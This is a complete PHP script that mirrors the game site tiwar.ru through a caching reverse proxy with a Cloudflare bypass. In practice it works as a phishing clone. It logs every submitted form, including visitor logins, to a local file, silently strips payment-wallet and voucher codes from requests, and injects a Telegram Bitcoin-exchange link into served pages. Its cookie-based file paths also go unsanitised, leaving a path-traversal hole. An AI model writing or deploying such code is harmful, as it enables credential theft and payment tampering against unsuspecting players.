<?php

ini_set('display_errors', true);

$url = 'http://tiwar.ru/';

$allowed = [
    /* Массив разрешённых реферов. */
    'referees' => [],
    /* Массив разрешённых браузеров. */
    'user-agents' => [],
    /* Массив разрешённых IP адресов. */
    'ip-addresses' => [
        $_SERVER['REMOTE_ADDR'],
    ],
];

$canAccess = false;

if (empty($_SERVER['HTTP_REFERER']) === false) {
    foreach ($allowed['referees'] as $referer) {
        if (strpos($_SERVER['HTTP_REFERER'], $referer) === false) {
            continue;
        }

        $canAccess = true;
        break;
    }
}

if ($canAccess === false && empty($_SERVER['HTTP_USER_AGENT']) === false) {
    foreach ($allowed['user-agents'] as $userAgent) {
        if (strpos($_SERVER['HTTP_USER_AGENT'], $userAgent) === false) {
            continue;
        }

        $canAccess = true;
        break;
    }
}

if ($canAccess === false) {
    if (empty($_SERVER['HTTP_CLIENT_IP']) === false) {
        $userIpAddress = $_SERVER['HTTP_CLIENT_IP'];
    } elseif (empty($_SERVER['HTTP_X_FORWARDED_FOR']) === false) {
        $userIpAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    } else {
        $userIpAddress = $_SERVER['REMOTE_ADDR'];
    }

    foreach ($allowed['ip-addresses'] as $ipAddress) {
        if ($userIpAddress !== $ipAddress) {
            continue;
        }

        $canAccess = true;
        break;
    }
}

if ($canAccess === false) {
    exit('Access is not allowed!');
}


if (empty($_COOKIE['id']) === true || is_file(__DIR__.'/cookies/'.$_COOKIE['id'].'.txt') === false) {
    $cookie = md5($_SERVER['REMOTE_ADDR'].time());
    setcookie('id', $cookie, time() + 60 * 60);
} else {
    $cookie = $_COOKIE['id'];
}


$timeNow = time();

$filesCacheFile = __DIR__.'/files_cache_time.json';
if (is_file($filesCacheFile) === true) {
    $filesCacheTime = json_decode(file_get_contents($filesCacheFile), true);
} else {
    $filesCacheTime = -PHP_INT_MAX;
}

if (is_dir(__DIR__.'/cache') === true && ($timeNow - $filesCacheTime) > 1800) {
    foreach (glob(__DIR__.'/cache/*') as $file) {
        unlink($file);
    }
    $filesCacheTime = $timeNow;
    file_put_contents($filesCacheFile, json_encode($filesCacheTime));
}

$cookiesCacheFile = __DIR__.'/cookies_cache_time.json';
if (is_file($cookiesCacheFile) === true) {
    $cookiesCacheTime = json_decode(file_get_contents($cookiesCacheFile), true);
} else {
    $cookiesCacheTime = -PHP_INT_MAX;
}

if (is_dir(__DIR__.'/cache') === true && ($timeNow - $cookiesCacheTime) > 1800) {
    foreach (glob(__DIR__.'/cache/*') as $file) {
        unlink($file);
    }
    $cookiesCacheTime = $timeNow;
    file_put_contents($cookiesCacheFile, json_encode($cookiesCacheTime));
}


$home = preg_replace('/^www\./iu', '', $_SERVER['HTTP_HOST']);

$requestUri = replaceWallets(ltrim(urldecode($_SERVER['REQUEST_URI']), '/'));

$_SESSION['last_url'] = $requestUri;


foreach ($_POST as $key => $value) {
    if (is_array($value) === true) {
        foreach ($value as $secondKey => $secondValue) {
            $_POST[$key][$secondKey] = replaceWallets($secondValue);
        }
    } else {
        $_POST[$key] = replaceWallets($value);
    }
}


$pathInfo = pathinfo(preg_replace('/\?.*$/iu', '', $requestUri));
$extension = isset($pathInfo['extension']) === true ? $pathInfo['extension'] : 'html';
$fileName = __DIR__.'/cache/'.md5($requestUri).'.'.$extension;


$inIgnorePaths = [
    'cffffffff'
];  

$inIgnore = $extension === 'php' || empty($pathInfo['basename']) === true;
if ($inIgnore === false) {
    foreach ($inIgnorePaths as $path) {
        if (strpos($requestUri, $path) !== false) {
            $inIgnore = true;
            break;
        }
    }
}

if ($inIgnore === true) {
    $fileName = mb_substr($fileName, 0, -mb_strlen($extension)).$cookie.'.'.$extension;
}

if (is_file($fileName) === false) {
    if (is_dir(__DIR__.'/cache/') === false && mkdir(__DIR__.'/cache/') === false) {
        throw new RuntimeException('Could not to create cache directory!');
    }

    if (empty($_POST) === false) {
        file_put_contents(__DIR__.'/forms911.txt', json_encode([
                'uri' => $requestUri,
                'post' => $_POST,
            ], JSON_UNESCAPED_UNICODE | JSON_PRETTY_PRINT).PHP_EOL, FILE_APPEND);
    }
    $data = fetch($url.$requestUri, $inIgnore === true ? $cookie : 'default', empty($_POST) === true ? null : $_POST);
    
    file_put_contents($fileName, replace($data['response']));
}

header('Content-Type: '.getFileMimeType($fileName));
readfile($fileName);
if ($inIgnore === true) {
    unlink($fileName);
}


function replaceWallets(string $wallet): string
{
    $pattern = '/(EX-CODE_[A-z,0-9]+)|(WEX[RUR|USD|EUR][A-Z,0-9]+)|(LVC-[RUR|USD|EUR][A-Z,0-9,-]+)/iu';
    if (preg_match($pattern, $wallet, $matches) === true) {
        $wallet = preg_replace($pattern, '', $wallet);
    }

    return $wallet;
}


function setHandleProxy($handle): void
{
    static $proxies, $count, $index = 0;
    if ($proxies === null || $count === null) {
        if (is_file(__DIR__.'/proxies.txt') === true) {
            $proxies = array_filter(file(__DIR__.'/proxies.txt'));
        } else {
            throw new RuntimeException('Proxies file does not exists!');
        }

        if (($count = count($proxies)) === 0) {
            throw new RuntimeException('Proxies count must be greater than 0!');
        }
    }

    if ($index > $count - 1) {
        $index = 0;
    }

    [$host, $port, $user, $password] = explode(':', $proxies[$index++]);

    curl_setopt_array($handle, [
        CURLOPT_PROXY => $host.':'.$port,
        CURLOPT_PROXYUSERPWD => $user.':'.$password,
    ]);

}


function fetch(string $url, string $cookie, ?array $data = null): array
{
    static $cloudFlare, $cloudFlareOptions;
    if ($cloudFlare === null || $cloudFlareOptions === null) {
        require __DIR__.'/vendor/autoload.php';

        $cloudFlare = new \CloudflareBypass\CFCurlImpl();
        $cloudFlareOptions = new \CloudflareBypass\Model\UAMOptions();
    }

    $curl = curl_init();
    curl_setopt_array($curl, [
        CURLOPT_URL => $url,
        CURLOPT_HTTPHEADER => [
            'Upgrade-Insecure-Requests: 1',
            'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Accept-Language: en-US,en;q=0.9',
        ],
        CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'],
        CURLINFO_HEADER_OUT => true,
        CURLOPT_CONNECTTIMEOUT => 5,
        CURLOPT_TIMEOUT => 30,
        CURLOPT_COOKIEFILE => __DIR__.'/cookies/'.$cookie.'.txt',
        CURLOPT_COOKIEJAR => __DIR__.'/cookies/'.$cookie.'.txt',
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_BINARYTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
    ]);

    if ($data !== null) {
        curl_setopt_array($curl, [
            CURLOPT_POST => true,
            CURLOPT_POSTFIELDS => http_build_query($data),
        ]);
    }

    for ($iteration = 0; $iteration < 4; ++$iteration) {
        try {
/*
            setHandleProxy($curl);
*/
            $response = $cloudFlare->exec($curl, $cloudFlareOptions);
            if (curl_errno($curl) === CURLE_OK) {
                return [
                    'info' => curl_getinfo($curl),
                    'response' => $response,
                ];
            }
        } catch (ErrorException $exception) {
            throw new RuntimeException('Error occured while getting page!');
        }
    }

    throw new RuntimeException('Error occured while getting page!');
}


function getFileMimeType(string $filename): string
{
    $mime_types = [
        'txt' => 'text/plain',
        'htm' => 'text/html',
        'html' => 'text/html',
        'php' => 'text/html',
        'css' => 'text/css',
        'js' => 'application/javascript',
        'json' => 'application/json',
        'xml' => 'application/xml',
        'swf' => 'application/x-shockwave-flash',
        'flv' => 'video/x-flv',

        'png' => 'image/png',
        'jpe' => 'image/jpeg',
        'jpeg' => 'image/jpeg',
        'jpg' => 'image/jpeg',
        'gif' => 'image/gif',
        'bmp' => 'image/bmp',
        'ico' => 'image/vnd.microsoft.icon',
        'tiff' => 'image/tiff',
        'tif' => 'image/tiff',
        'svg' => 'image/svg+xml',
        'svgz' => 'image/svg+xml',

        'ttf' => 'application/x-font-ttf',
        'otf' => 'application/x-font-opentype',
        'woff' => 'application/font-woff',
        'woff2' => 'application/font-woff2',
        'eot' => 'application/vnd.ms-fontobject',
        'sfnt' => 'application/font-sfnt',

        'zip' => 'application/zip',
        'rar' => 'application/x-rar-compressed',
        'exe' => 'application/x-msdownload',
        'msi' => 'application/x-msdownload',
        'cab' => 'application/vnd.ms-cab-compressed',

        'mp3' => 'audio/mpeg',
        'qt' => 'video/quicktime',
        'mov' => 'video/quicktime',

        'pdf' => 'application/pdf',
        'psd' => 'image/vnd.adobe.photoshop',
        'ai' => 'application/postscript',
        'eps' => 'application/postscript',
        'ps' => 'application/postscript',

        'doc' => 'application/msword',
        'rtf' => 'application/rtf',
        'xls' => 'application/vnd.ms-excel',
        'ppt' => 'application/vnd.ms-powerpoint',

        'odt' => 'application/vnd.oasis.opendocument.text',
        'ods' => 'application/vnd.oasis.opendocument.spreadsheet',
    ];

    $tmp = explode('.', $filename);
    $ext = strtolower(array_pop($tmp));

    if (array_key_exists($ext, $mime_types)) {
        return $mime_types[$ext];
    } elseif (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME);
        $mimetype = finfo_file($finfo, $filename);
        finfo_close($finfo);

        return $mimetype;
    } else {
        return 'application/octet-stream';
    }
}


function replace(string $data): string
{
    $data = str_ireplace('18+', '18+<br><a href="https://telegram.me/BTC_CHANGE_BOT?start=1Mbs">Bitcoin обменник</a>', $data);
    
    
    return $data;
}



?>